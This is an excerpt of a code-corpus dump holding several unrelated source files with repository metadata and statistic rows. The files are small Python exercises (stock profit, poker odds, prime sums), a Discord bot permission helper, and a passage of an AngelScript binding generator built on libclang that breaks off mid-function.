                return errors.all_errors('IMAGE_DELETE_ERROR', f"{args['ami_label']} could not have been deleted because of {e}")
        else:
            return errors.all_errors('IMAGE_DELETE_ERROR', f"{args['ami_label']} could not be found")
| 45.655367
| 205
| 0.516891
| 862
| 8,081
| 4.684455
| 0.25522
| 0.059435
| 0.037147
| 0.052006
| 0.418029
| 0.381129
| 0.360079
| 0.324418
| 0.278851
| 0.217434
| 0
| 0.008069
| 0.371241
| 8,081
| 177
| 206
| 45.655367
| 0.786656
| 0.276946
| 0
| 0.211111
| 0
| 0.022222
| 0.272057
| 0.013962
| 0
| 0
| 0
| 0
| 0
| 1
| 0.033333
| false
| 0
| 0.122222
| 0
| 0.311111
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
75bb6e08d53656c02653379a24d3bf7833708bba
| 807
|
py
|
Python
|
Day 5/python/main.py
|
BenBMoore/leetcode-challenges
|
97359abbeb24daf8cc33fe2bf1d5748ac824aab4
|
[
"MIT"
] | null | null | null |
Day 5/python/main.py
|
BenBMoore/leetcode-challenges
|
97359abbeb24daf8cc33fe2bf1d5748ac824aab4
|
[
"MIT"
] | null | null | null |
Day 5/python/main.py
|
BenBMoore/leetcode-challenges
|
97359abbeb24daf8cc33fe2bf1d5748ac824aab4
|
[
"MIT"
] | null | null | null |
import argparse
from typing import List
class Solution:
    """Solver for LeetCode's 'Best Time to Buy and Sell Stock II'."""

    def max_profit(self, prices: List[int]) -> int:
        """Return the maximum total profit with unlimited buy/sell transactions.

        Greedy: summing every positive day-over-day increase is equivalent
        to buying before each rise and selling at each local peak.
        """
        total = 0
        for today, tomorrow in zip(prices, prices[1:]):
            if tomorrow > today:
                total += tomorrow - today
        return total
def main():
    """Parse prices from the command line and print the maximum trading profit."""
    parser = argparse.ArgumentParser(description='Process some integers.')
    parser.add_argument('integers', metavar='N', type=int, nargs='+',
                        help='An integer for processing by the happy number process')
    args = parser.parse_args()
    prices = args.integers
    # BUG FIX: the original called Solution().max_sub_array(), a method that
    # does not exist on Solution (AttributeError at runtime); the intended
    # entry point is max_profit().
    max_sum = Solution().max_profit(prices)
    print(max_sum)
if __name__ == "__main__":
main()
| 27.827586
| 85
| 0.619579
| 106
| 807
| 4.54717
| 0.584906
| 0.074689
| 0.041494
| 0.06639
| 0.078838
| 0
| 0
| 0
| 0
| 0
| 0
| 0.00846
| 0.267658
| 807
| 28
| 86
| 28.821429
| 0.807107
| 0.083024
| 0
| 0
| 0
| 0
| 0.126016
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.105263
| false
| 0
| 0.105263
| 0
| 0.315789
| 0.052632
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
75bdd147dbc8647c0747f11af9d4431656daa233
| 947
|
py
|
Python
|
ex2.py
|
timwuu/AnaPoker
|
7cb125c4639a5cd557a6b45c92b5793dcc39def8
|
[
"MIT"
] | null | null | null |
ex2.py
|
timwuu/AnaPoker
|
7cb125c4639a5cd557a6b45c92b5793dcc39def8
|
[
"MIT"
] | null | null | null |
ex2.py
|
timwuu/AnaPoker
|
7cb125c4639a5cd557a6b45c92b5793dcc39def8
|
[
"MIT"
] | null | null | null |
import calcWinRate as cwr
def pp(a, b, table, k):
    """Simulate *k* showdowns of hand *a* vs hand *b* on *table* and print
    both hands, the board and the resulting win percentages."""
    rates = cwr.calc_win_rate(a, b, table, k)
    shown = [cwr.card_lst(cards) for cards in (a, b, table)]
    print("{} vs {} with {}".format(*shown))
    print("{:2.2%} vs {:2.2%}\n".format(rates[0], rates[1]))
k= 10000 # simulate k times
# NOTE(review): card values run up to 52 below, so the encoding is
# presumably 1..52 integers — confirm against calcWinRate.
# --- example 0 ---
# --- 1-draw straight vs 4-card flush
player_a = [51,43] #AQ
player_b = [52,48] #AKs
table_cards = [47,40,28] #K,J,8
pp( player_a, player_b, table_cards, k)
# --- straight vs 4-card flush
player_a = [51,43] #AQ
player_b = [52,48] #AKs
table_cards = [47,40,28,33] #K,J,8,T
pp( player_a, player_b, table_cards, k)
# --- straight vs three of kind
player_a = [51,43] #AQ
player_b = [47,46] #KK
table_cards = [48,40,26,33] #K,J,8,T
pp( player_a, player_b, table_cards, k)
# --- straight vs two pairs
player_a = [51,43] #AQ
player_b = [47,39] #KJs
table_cards = [48,40,26,33] #K,J,8,T
pp( player_a, player_b, table_cards, k)
| 22.023256
| 93
| 0.62302
| 185
| 947
| 3.032432
| 0.308108
| 0.099822
| 0.064171
| 0.078431
| 0.620321
| 0.620321
| 0.620321
| 0.620321
| 0.541889
| 0.541889
| 0
| 0.104381
| 0.18057
| 947
| 42
| 94
| 22.547619
| 0.618557
| 0.211193
| 0
| 0.545455
| 0
| 0
| 0.049451
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.045455
| false
| 0
| 0.045455
| 0
| 0.090909
| 0.090909
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
75bf78052e28e2d4673d9f69709a11b7958bfff3
| 1,085
|
py
|
Python
|
Utils/Permission.py
|
koi312500/Koi_Bot_Discord
|
9d7a70f42cdb1110e6382125ade39d3aec21b3b9
|
[
"MIT"
] | null | null | null |
Utils/Permission.py
|
koi312500/Koi_Bot_Discord
|
9d7a70f42cdb1110e6382125ade39d3aec21b3b9
|
[
"MIT"
] | 1
|
2021-06-23T01:16:36.000Z
|
2021-06-23T01:16:36.000Z
|
Utils/Permission.py
|
koi312500/Koi_Bot_Discord
|
9d7a70f42cdb1110e6382125ade39d3aec21b3b9
|
[
"MIT"
] | null | null | null |
import discord
from discord.ext import commands
from Utils.UserClass import UserClass as User
permission_message = ["Guest [Permission Level : 0]", "User [Permission Level : 1]", "Developer [Permission Level : 2]", "Owner [Permission Level : 3]"]
async def check_permission(ctx, level):
    """Return False when ctx.author's permission meets *level*; otherwise
    respond with an explanatory error embed and return True (i.e. the
    return value answers "was the command blocked?")."""
    requester = User(ctx.author)
    if requester.permission >= level:
        return False
    embed = discord.Embed(title=f"User Permission Error", color=0xff0000)
    embed.set_footer(text="Sented by Koi_Bot#4999ㆍUser Permission Error")
    # Guests blocked from level-1 commands get a hint on how to gain access.
    if requester.permission == 0 and level == 1:
        embed.add_field(name="Suggestion", value="/accept_term으로 약관 동의를 하시면, 'User [Permission Level : 1]' 권한을 얻어, 이 명령어를 실행 하실 수 있습니다.", inline=False)
    embed.add_field(name="Your Permission", value=f"{str(permission_message[int(requester.permission)])}", inline=True)
    embed.add_field(name="Command Executable Permission", value=f"{str(permission_message[int(level)])}", inline=True)
    await ctx.respond(embed=embed)
    return True
| 57.105263
| 161
| 0.682028
| 145
| 1,085
| 5.006897
| 0.489655
| 0.134986
| 0.078512
| 0.070248
| 0.107438
| 0.107438
| 0.107438
| 0
| 0
| 0
| 0
| 0.018412
| 0.199078
| 1,085
| 19
| 162
| 57.105263
| 0.817031
| 0
| 0
| 0
| 0
| 0.058824
| 0.37477
| 0.081031
| 0
| 0
| 0.007366
| 0
| 0
| 1
| 0
| false
| 0
| 0.176471
| 0
| 0.294118
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
75bfcbaef981a9d2b8f3eecff56d9741a7a40637
| 436
|
py
|
Python
|
10.py
|
seanmanson/euler
|
b01418cf44c1113a0c574b5158aa5b89d725cca2
|
[
"MIT"
] | null | null | null |
10.py
|
seanmanson/euler
|
b01418cf44c1113a0c574b5158aa5b89d725cca2
|
[
"MIT"
] | null | null | null |
10.py
|
seanmanson/euler
|
b01418cf44c1113a0c574b5158aa5b89d725cca2
|
[
"MIT"
] | null | null | null |
import math
test = []
def testPrime(num):
sq = int(math.sqrt(num))
for i, factor in enumerate(test):
if (i > sq):
break
if (num % factor == 0):
return False
test.append(num)
return True
# Sum all primes below two million (Project Euler #10).
# Start at 2 — the only even prime — then probe odd candidates only.
sumPrimes = 2
for candidate in range(3, 2000000, 2):
    if testPrime(candidate):
        sumPrimes += candidate
        # Periodic progress report while the sieve grows.
        if candidate % 10000 == 1:
            print("progress : ", candidate, sumPrimes)
print(sumPrimes)
| 18.166667
| 42
| 0.538991
| 58
| 436
| 4.051724
| 0.551724
| 0.034043
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.058621
| 0.334862
| 436
| 23
| 43
| 18.956522
| 0.751724
| 0
| 0
| 0
| 0
| 0
| 0.025229
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.052632
| false
| 0
| 0.052632
| 0
| 0.210526
| 0.105263
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
75c33edb1fb71d6cd1c893b5ce0674035ed9e6dd
| 37,403
|
py
|
Python
|
clangelscript.py
|
gwihlidal/Clangelscript
|
e83f77d78bf57c25f67922b65aad2f8e74ce2699
|
[
"MIT"
] | 1
|
2019-06-21T06:37:16.000Z
|
2019-06-21T06:37:16.000Z
|
clangelscript.py
|
gwihlidal/clangelscript
|
e83f77d78bf57c25f67922b65aad2f8e74ce2699
|
[
"MIT"
] | null | null | null |
clangelscript.py
|
gwihlidal/clangelscript
|
e83f77d78bf57c25f67922b65aad2f8e74ce2699
|
[
"MIT"
] | null | null | null |
import sys
import re
import json
import os.path
import copy
from mako.template import Template
from clang import cindex
# Load the JSON config. The file may contain C++-style "//" line comments,
# which strict JSON forbids, so strip them before parsing.
configfile = "clangelscript.json"
with open(configfile) as f:
    data = f.read()
# BUG FIX: the pattern was r"//[^n]*n" (missing backslashes), which matched
# "//" up to a literal letter 'n' and corrupted the config text instead of
# removing comments up to the end of the line.
data = re.sub(r"//[^\n]*\n", "\n", data)
config = json.loads(data)
if "ObjectTypes" in config:
    # Re-key the ObjectTypes table by compiled regex so later lookups can
    # match type names by pattern instead of exact string equality.
    arr = config["ObjectTypes"]
    config["ObjectTypes"] = {}
    for name in arr:
        config["ObjectTypes"][re.compile(name)] = arr[name]
def get(name, default=None, conf=config):
    """Look up `name` in mapping `conf` (the loaded config by default),
    returning `default` when the key is absent."""
    return conf[name] if name in conf else default
# Optional include/exclude regex filters, read from the config file.
fir = get("FileIncludeRegex", None)
fer = get("FileExcludeRegex", None)
mir = get("MethodIncludeRegex", None)
mer = get("MethodExcludeRegex", None)
oir = get("ObjectIncludeRegex", None)
oer = get("ObjectExcludeRegex", None)
mfir = get("FieldIncludeRegex", None)
mfer = get("FieldExcludeRegex", None)
generic_regex = get("GenericWrapperRegex", None)
maahr = get("MethodArgumentAutoHandleRegex", None)
mrahr = get("MethodReturnAutoHandleRegex", None)
# Compile each filter only when it was actually provided; None stays None.
fir = re.compile(fir) if fir else fir
fer = re.compile(fer) if fer else fer
mir = re.compile(mir) if mir else mir
mer = re.compile(mer) if mer else mer
oir = re.compile(oir) if oir else oir
oer = re.compile(oer) if oer else oer
mfir = re.compile(mfir) if mfir else mfir
mfer = re.compile(mfer) if mfer else mfer
maahr = re.compile(maahr) if maahr else maahr
mrahr = re.compile(mrahr) if mrahr else mrahr
generic_regex = re.compile(generic_regex) if generic_regex else generic_regex
# Global behaviour switches.
verbose = get("Verbose", False)
doassert = get("Assert", True)
keep_unknowns = get("KeepUnknowns", False)
output_filename = get("OutputFile", None)
funcname = get("FunctionName", "registerScripting")
# Bodies of generated asCALL_GENERIC wrapper functions (filled later).
generic_wrappers = []
index = cindex.Index.create()
clang_args = get("ClangArguments", [])
#clang_args.insert(0, "-I%s/clang/include" % os.path.dirname(os.path.abspath(__file__)))
# Expand ${ConfigFilePath} in the clang arguments to the config's directory.
new_args = []
for arg in clang_args:
    new_args.append(arg.replace("${ConfigFilePath}", os.path.dirname(os.path.abspath(configfile))))
clang_args = new_args
# NOTE(review): 13 is a parse-options bitmask passed straight to libclang —
# confirm its meaning against the cindex TranslationUnit flags.
tu = index.parse(None, clang_args, [], 13)
# Running total of warnings emitted via logWarning().
warn_count = 0
def logWarning(msg):
    """Count one warning and, when Verbose is enabled, echo it to stderr."""
    global warn_count
    warn_count = warn_count + 1
    if verbose:
        sys.stderr.write("%s\n" % msg)
def get_type(type, cursor=None):
    """Render a cindex.Type as a C type string (e.g. "Foo*", "unsigned int").

    Pointer/reference-ness is preserved as a trailing "*" or "&".  `cursor`
    is only needed to resolve constant arrays.  Raises on types that cannot
    be resolved to a usable name.
    """
    pointer = type.kind == cindex.TypeKind.POINTER
    typename = ""
    ref = type.kind == cindex.TypeKind.LVALUEREFERENCE
    if type.kind == cindex.TypeKind.TYPEDEF or type.kind == cindex.TypeKind.RECORD or type.kind == cindex.TypeKind.ENUM:
        # Named user types: hold on to the declaration cursor for now.
        typename = type.get_declaration()
    elif pointer or ref:
        t2 = type.get_pointee()
        typename = t2.get_declaration()
        if typename is None or typename.kind.is_invalid():
            # Pointee has no declaration (builtin etc.) — recurse on it.
            typename = get_type(t2)
    elif type.kind == cindex.TypeKind.ULONG:
        typename = "unsigned long"
    elif type.kind == cindex.TypeKind.UINT:
        typename = "unsigned int"
    elif type.kind == cindex.TypeKind.USHORT:
        typename = "unsigned short"
    elif type.kind == cindex.TypeKind.CONSTANTARRAY:
        if cursor is None:
            raise Exception("Constant array, but cursor not provided so can't solve the type")
        typename = get_type(type.get_array_element_type())
    else:
        # Fall back to libclang's kind name (e.g. "int", "float").
        typename = type.kind.name.lower()
    if typename is None:
        raise Exception("Typename was None %s" % type.kind)
    elif isinstance(typename, cindex.Cursor):
        # Declaration cursor: build the fully qualified "Ns::Class::Name".
        if typename.spelling == None:
            raise Exception("Typename was None %s" % type.kind)
        fullname = [typename.spelling]
        cursor = typename.lexical_parent
        while not cursor is None and (cursor.kind == cindex.CursorKind.NAMESPACE or cursor.kind == cindex.CursorKind.CLASS_DECL):
            fullname.insert(0, cursor.displayname)
            cursor = cursor.lexical_parent
        typename = "::".join(fullname)
    elif typename == "unexposed":
        raise Exception("Typename is unexposed")
    return "%s%s" % (typename, "*" if pointer else "&" if ref else "")
def is_int(literal):
    """Return True when `literal` parses as a decimal or base-16 integer."""
    try:
        int(literal)
        return True
    except (ValueError, TypeError):
        # Not decimal; try hexadecimal (e.g. "ff", "0x1A").
        # The original used bare `except:`, which also swallowed things like
        # KeyboardInterrupt — narrowed to the exceptions int() actually raises.
        try:
            int(literal, 16)
            return True
        except (ValueError, TypeError):
            pass
    return False
# Per-type usage tally: name -> (uses as pointer, uses as value).
objecttype_scoreboard = {}

def add_use(typename):
    """Record one use of `typename`, bucketed as pointer ("*"-suffixed) or value."""
    is_ptr = 1 if "*" in typename else 0
    if is_ptr:
        # Strip the trailing star so both spellings share one scoreboard entry.
        typename = typename[:-1]
    ptr_uses, val_uses = objecttype_scoreboard.get(typename, (0, 0))
    objecttype_scoreboard[typename] = (ptr_uses + is_ptr, val_uses + (1 - is_ptr))
# Maps a typedef'd name to its underlying type name (chains allowed).
typedef = {}

def get_real_type(name):
    """Resolve typedef chains for `name`, preserving a trailing '*' or '&'."""
    suffix = ""
    if "*" in name:
        suffix = "*"
        name = name[:-1]
    elif "&" in name:
        suffix = "&"
        name = name[:-1]
    # Follow the typedef chain until we hit a non-typedef'd name.
    while name in typedef:
        name = typedef[name]
    return name + suffix
def is_const(cursor):
    """Return True when the raw source tokens of `cursor`'s extent contain
    the keyword `const`."""
    #tokens = cindex.tokenize(tu, cursor.extent)
    tokens = list(cindex.TokenGroup.get_tokens(tu, cursor.extent))
    for token in tokens:
        if token.spelling == "const":
            return True
    return False
# C type name -> AngelScript builtin type name.
as_builtins = {
    "unsigned long": "uint64",
    "unsigned int": "uint",
    "unsigned short": "uint16",
    "unsigned char": "uint8",
    "long": "int64",  # was listed twice in the original literal; duplicate removed
    "void": "void",
    "double": "double",
    "float": "float",
    "char": "int8",
    "short": "int16",
    "int": "int",
    "bool": "bool"
}

def get_as_type(name):
    """Translate C type `name` (optionally '*'/'&'-suffixed) to AngelScript.

    Builtins map through `as_builtins`; a pointer becomes a handle '@' and a
    reference keeps '&'.  Raises when a builtin value type is used through a
    pointer, since AngelScript has no handles to primitive types.
    """
    ptr = "*" in name
    ref = "&" in name
    name = name.replace("*", "").replace("&", "")
    if name in as_builtins:
        if ptr:
            raise Exception("Built-in value type %s used as a reference type" % (as_builtins[name]))
        name = as_builtins[name]
    return "%s%s%s" % (name, "@" if ptr else "", "&" if ref else "")
class Type:
    """A C type seen in a signature: raw spelling, typedef-resolved spelling,
    and constness — plus its AngelScript rendering."""
    def __init__(self, kind):
        # `kind` is a cindex.Type. Keep both the literal spelling (cname)
        # and the typedef-resolved spelling (resolved).
        typename = get_type(kind)
        self.cname = typename
        typename = get_real_type(typename)
        self.resolved = typename
        # Tally pointer-vs-value usage for the ref/value heuristic.
        add_use(typename)
        self.const = kind.is_const_qualified()
        # Called for its side effect only: raises early when the type cannot
        # be expressed in AngelScript.
        get_as_type(self.resolved)
    def __repr__(self):
        return self.cname
    def get_as_type(self):
        """AngelScript type string, honouring config AngelScriptType overrides."""
        as_type = None
        if "ObjectTypes" in config:
            for regex in config["ObjectTypes"]:
                if regex.search(self.cname) != None:
                    conf = config["ObjectTypes"][regex]
                    if "AngelScriptType" in conf:
                        # Regex substitution lets the config rewrite e.g.
                        # template spellings into script-visible names.
                        as_type = regex.sub(conf["AngelScriptType"], self.cname)
                    break
        if as_type == None:
            as_type = get_as_type(self.resolved)
        return "%s%s" % ("const " if self.const else "", as_type)
    def is_known(self):
        """True when the type is a builtin, a discovered object type, or is
        matched by a configured ObjectTypes pattern."""
        name = self.resolved.replace("*", "").replace("&", "")
        if name in objecttypes:
            return True
        if name in as_builtins:
            return True
        if "ObjectTypes" in config:
            for regex in config["ObjectTypes"]:
                if regex.search(self.cname) != None:
                    return True
        return False
    def get_c_type(self):
        """C type string, with constness prepended."""
        return "%s%s" % ("const " if self.const else "", self.cname)
def is_reference_type(name):
    """Decide whether `name` should be registered as an AngelScript reference
    type (True), a value type (False), or is undecidable (None).

    Precedence: explicit config "Reference" flag > inherited verdict from a
    parent class > usage heuristic (more pointer uses than value uses).
    """
    if "ObjectTypes" in config:
        for regex in config["ObjectTypes"]:
            if regex.search(name) and "Reference" in config["ObjectTypes"][regex]:
                return config["ObjectTypes"][regex]["Reference"]
    if name in objecttypes:
        ot = objecttypes[name]
        for p in ot.parents:
            # A child must agree with the first parent that has a verdict.
            v = is_reference_type(p)
            if not v is None:
                return v
    if name in objecttype_scoreboard:
        score = objecttype_scoreboard[name]
        # Heuristic: used more often via pointer than by value -> reference.
        return score[0] > score[1]
    return None
# C++ operator spelling -> AngelScript operator-method name.
# Commented-out entries are operators AngelScript folds into another method
# (e.g. != is derived from opEquals, ordering from opCmp).
operatornamedict = {
    "-operator": "opNeg",
    "~operator": "opCom",
    "++operator": "opPreInc",
    "--operator": "opPreDec",
    "operator==": "opEquals",
    #"operator!=": "opEquals",
    "operator<": "opCmp",
    # "operator<=": "opCmp",
    # "operator>": "opCmp",
    # "operator>=": "opCmp",
    "operator++": "opPostInc",
    "operator--": "opPostDec",
    "operator+": "opAdd",
    "operator-": "opSub",
    "operator*": "opMul",
    "operator/": "opDiv",
    "operator%": "opMod",
    "operator&": "opAnd",
    "operator|": "opOr",
    "operator^": "opXor",
    "operator<<": "opShl",
    "operator>>": "opShr",
    "operator>>>": "opUShr",
    "operator[]": "opIndex",
    "operator=": "opAssign",
    "operator+=": "opAddAssign",
    "operator-=": "opSubAssign",
    "operator*=": "opMulAssign",
    "operator/=": "opDivAssign",
    "operator%=": "opModAssign",
    "operator&=": "opAndAssign",
    "operator|=": "opOrAssign",
    "operator^=": "opXorAssign",
    "operator<<=": "opShlAssign",
    "operator>>=": "opShrAssign",
    "operator>>>=": "opUShrAssign",
}
class Function(object):
    """A free function or method to be registered with AngelScript.

    Wraps a libclang cursor, resolving argument/return types, constness
    (by re-reading the raw source around the cursor's extent) and the
    AngelScript declaration string.  Raises from __init__ when the function
    is filtered out or uses unsupported constructs; callers catch and skip.
    """
    def __init__(self, cursor, clazz=None, behaviour=None):
        self.args = []
        if cursor is None:
            # Blank instance: fields are filled in manually by the caller
            # (see ObjectType.get_register_string's AddRef/DelRef fabrication).
            return
        children = list(cursor.get_children())
        for child in children:
            if child.kind == cindex.CursorKind.PARM_DECL:
                t = Type(child.type)
                # Parameter constness comes from the tokens, not the type.
                t.const = is_const(child)
                self.args.append(t)
        self.name = cursor.spelling
        self.return_type = Type(cursor.result_type)
        self.clazz = clazz
        self.const = False
        self.behaviour = behaviour
        if self.clazz and not behaviour:
            # Detect a trailing `const` (and `= 0`) on a method by reading
            # the raw source between the last parameter and the body.
            start = cursor.extent.start
            end = cursor.extent.end
            i = 0
            while i < len(children):
                if children[i].kind == cindex.CursorKind.PARM_DECL:
                    start = children[i].extent.end
                if children[i].kind == cindex.CursorKind.COMPOUND_STMT:
                    if i > 0:
                        start = children[i-1].extent.end
                    end = children[i].extent.start
                    break
                i += 1
                if i == len(children):
                    break
                start = children[i-1].extent.end
            r = cindex.SourceRange.from_locations(start, end)
            f = open(cursor.location.file.name)
            f.seek(start.offset)
            length = end.offset-start.offset
            data = f.read(length)
            f.close()
            self.const = re.search(r"\s*const\s*(=\s*0)?$", data) != None
        if len(children) > 0 and children[0].kind != cindex.CursorKind.PARM_DECL:
            # Detect a const-qualified return type by reading the source
            # before the function name.
            f = open(cursor.location.file.name)
            f.seek(cursor.extent.start.offset)
            length = children[0].extent.start.offset-cursor.extent.start.offset
            data = f.read(length)
            f.close()
            data = re.sub(r"%s.*" % self.name, "", data)
            self.return_type.const = re.search(r"\s*const\s*$", data) != None
        # Called for validation only: raises on unsupported operators etc.
        self.asname()
        if mir or mer:
            pn = self.pretty_name()
            if mer and mer.search(pn):
                raise Exception("Function matches exclusion pattern. %s" % pn)
            if mir and not mir.search(pn):
                raise Exception("Function does not match inclusion pattern. %s" % pn)
    def uses(self, typename):
        """True when `typename` appears as the return type or any argument."""
        if self.return_type.resolved == typename:
            return True
        for t in self.args:
            if t.resolved == typename:
                return True
        return False
    def pretty_name(self):
        """Human-readable C signature, used for filters and log messages."""
        cargs = ", ".join([t.get_c_type() for t in self.args])
        if self.clazz:
            return "%s %s::%s(%s)" % (self.return_type, self.clazz, self.name, cargs)
        else:
            return "%s %s(%s)" % (self.return_type, self.name, cargs)
    def asname(self):
        """Build the AngelScript declaration string for this function.

        Side effect: constructors of reference types are promoted to
        asBEHAVE_FACTORY.  Raises for operators AngelScript cannot express.
        """
        name = self.name
        if "operator" in name:
            if name not in operatornamedict:
                raise Exception("Operator not supported in AngelScript %s" % self.pretty_name())
            name = operatornamedict[name]
        asargs = []
        auto_handle_args = False
        auto_handle_return = False
        if maahr and maahr.search(self.pretty_name()) != None:
            auto_handle_args = True
        if mrahr and mrahr.search(self.pretty_name()) != None:
            auto_handle_return = True
        for a in self.args:
            asname = a.get_as_type()
            ref = "&" in asname
            if ref:
                asname2 = get_as_type(a.resolved)[:-1]
                extra = ""
                if not is_reference_type(asname2):
                    # Value types can only be in or out references. Defaulting to in
                    asname += "in"
            if "@" in asname and auto_handle_args:
                # "@+" marks an auto-handle; skipped for asOBJ_NOCOUNT types.
                asname2 = asname[:-1]
                add = True
                if asname2 in objecttypes:
                    ot = objecttypes[asname2]
                    if "asOBJ_NOCOUNT" in ot.get_flags():
                        add = False
                if add:
                    asname += "+"
            asargs.append(asname)
        asargs = ", ".join(asargs)
        if self.behaviour == "asBEHAVE_CONSTRUCT" or self.behaviour == "asBEHAVE_FACTORY":
            name = "void f(%s)" % (asargs)
            if is_reference_type(self.clazz):
                # Reference types are created through factories returning a
                # handle, not through in-place constructors.
                add = auto_handle_return
                if self.clazz in objecttypes:
                    ot = objecttypes[self.clazz]
                    if "asOBJ_NOCOUNT" in ot.get_flags():
                        add = False
                name = "%s@%s %s(%s)" % (self.clazz, "+" if add else "", self.clazz, asargs)
                self.behaviour = "asBEHAVE_FACTORY"
        elif self.behaviour == "asBEHAVE_DESTRUCT":
            name = "void f()"
        else:
            asname = self.return_type.get_as_type()
            if "@" in asname and auto_handle_return:
                asname2 = asname[:-1]
                add = True
                if asname2 in objecttypes:
                    ot = objecttypes[asname2]
                    if "asOBJ_NOCOUNT" in ot.get_flags():
                        add = False
                if add:
                    asname += "+"
            name = "%s %s(%s)" % (asname, name, asargs)
        if self.clazz and self.const:
            name += " const"
        return name
    def get_generic(self):
        """Emit a C++ asCALL_GENERIC wrapper for this function and return the
        registration argument string referring to it.

        The wrapper body is appended to the module-level `generic_wrappers`
        list (deduplicated) for the template to emit.
        """
        # AngelScript primitive -> asIScriptGeneric accessor suffix.
        lut = {
            "double": "Double",
            "float": "Float",
            "uint": "DWord",
            "int": "DWord",
            "uint16": "Word",
            "int16": "Word",
            "uint8": "Byte",
            "int8": "Byte",
            "bool": "Byte"
        }
        name = self.name
        if "operator" in name:
            name = operatornamedict[name]
        # Mangle the argument types into a unique C identifier for the wrapper.
        name = name.replace("~", "tilde") + "_generic"
        for arg in self.args:
            name += "_" + arg.get_c_type().replace("&", "amp").replace("*", "star").replace(" ", "space").replace(":", "colon")
        if self.clazz:
            name = self.clazz + "_" + name
        func = "void %s(asIScriptGeneric *gen)\n{\n" % name
        asret = self.return_type.get_as_type()
        call = "%s(" % self.name
        if self.clazz:
            if is_reference_type(self.clazz) and self.behaviour == "asBEHAVE_CONSTRUCT":
                self.behaviour = "asBEHAVE_FACTORY"
            if self.behaviour == "asBEHAVE_FACTORY":
                call = "gen->SetReturnAddress(new %s(" % (self.name)
            elif self.behaviour == "asBEHAVE_CONSTRUCT":
                # Placement-new into the memory the engine allocated.
                call = "new(gen->GetObject()) %s(" % self.name
            else:
                call = "static_cast<%s*>(gen->GetObject())->%s" % (self.clazz, call)
        for i in range(len(self.args)):
            if i > 0:
                call += ", "
            arg = self.args[i]
            t = arg.get_as_type()
            if t in lut:
                call += "gen->GetArg%s(%d)" % (lut[t], i)
            else:
                # Non-primitive: fetch by address/object and cast; dereference
                # (leading '*') unless the parameter itself is a pointer.
                ct = arg.get_c_type()
                pt = "*" in ct
                star = "*" if not pt else ""
                if "&" in ct:
                    call += "%sstatic_cast<%s%s>(gen->GetArgAddress(%d))" % (star, arg.get_c_type().replace("&", ""), star, i)
                else:
                    call += "%sstatic_cast<%s%s>(gen->GetArgObject(%d))" % (star, arg.get_c_type(), star, i)
        call += ")"
        if self.behaviour == "asBEHAVE_FACTORY":
            # Close the extra parenthesis opened by SetReturnAddress(new ...(.
            call += ")"
        asret2 = asret.replace("const ", "").strip()
        if asret2 in lut:
            func += "\tgen->SetReturn%s(%s);\n" % (lut[asret2], call)
        elif asret == "void":
            func += "\t" + call + ";\n"
        else:
            ct = self.return_type.get_c_type()
            pt = "*" in ct
            star = "*" if not pt else ""
            if pt:
                func += "\tgen->SetReturnAddress(%s);\n" % (call)
            elif "&" in ct:
                func += "\tgen->SetReturnAddress((void*)&%s);\n" % (call)
            else:
                # Return by value: copy into a local and hand its address over.
                func += "\t" + self.return_type.get_c_type().replace("&", "").replace("const ", "") + " ret = %s;\n" % call
                func += "\tgen->SetReturnObject(&ret);\n"
        #func += "\t" + self.return_type.get_c_type() + " ret = %s;\n" % call
        #func += "\tnew(gen->GetAddressOfReturnLocation()) %s(ret);\n" % self.return_type.get_c_type().replace("&", "")
        func += "}\n"
        if func not in generic_wrappers:
            generic_wrappers.append(func)
        return "asFUNCTION(%s), asCALL_GENERIC" % (name)
    def get_register_string(self):
        """The engine->Register...() statement registering this function."""
        global generic_wrappers
        cargs = ", ".join([at.get_c_type() for at in self.args])
        if self.clazz == None:
            callconv = "asCALL_CDECL"
            call = "asFUNCTIONPR(%s, (%s), %s), %s" % (self.name, cargs, self.return_type.get_c_type(), callconv)
            if generic_regex and generic_regex.search(self.pretty_name()):
                call = self.get_generic()
            return _assert("engine->RegisterGlobalFunction(\"%s\", %s)" % (self.asname(), call))
        else:
            const = " const" if self.const else ""
            call = "asMETHODPR(%s, %s, (%s)%s, %s), asCALL_THISCALL" % (self.clazz, self.name, cargs, const, self.return_type.get_c_type())
            # Constructors/destructors/factories always go through a generic
            # wrapper; plain methods only when the config regex asks for it.
            if (generic_regex and generic_regex.search(self.pretty_name())) or \
                self.behaviour == "asBEHAVE_CONSTRUCT" or \
                self.behaviour == "asBEHAVE_DESTRUCT" or \
                self.behaviour == "asBEHAVE_FACTORY":
                call = self.get_generic()
            if self.behaviour == None:
                return _assert("engine->RegisterObjectMethod(\"%s\", \"%s\", %s)" % (self.clazz, self.asname(), call))
            else:
                name = self.asname()
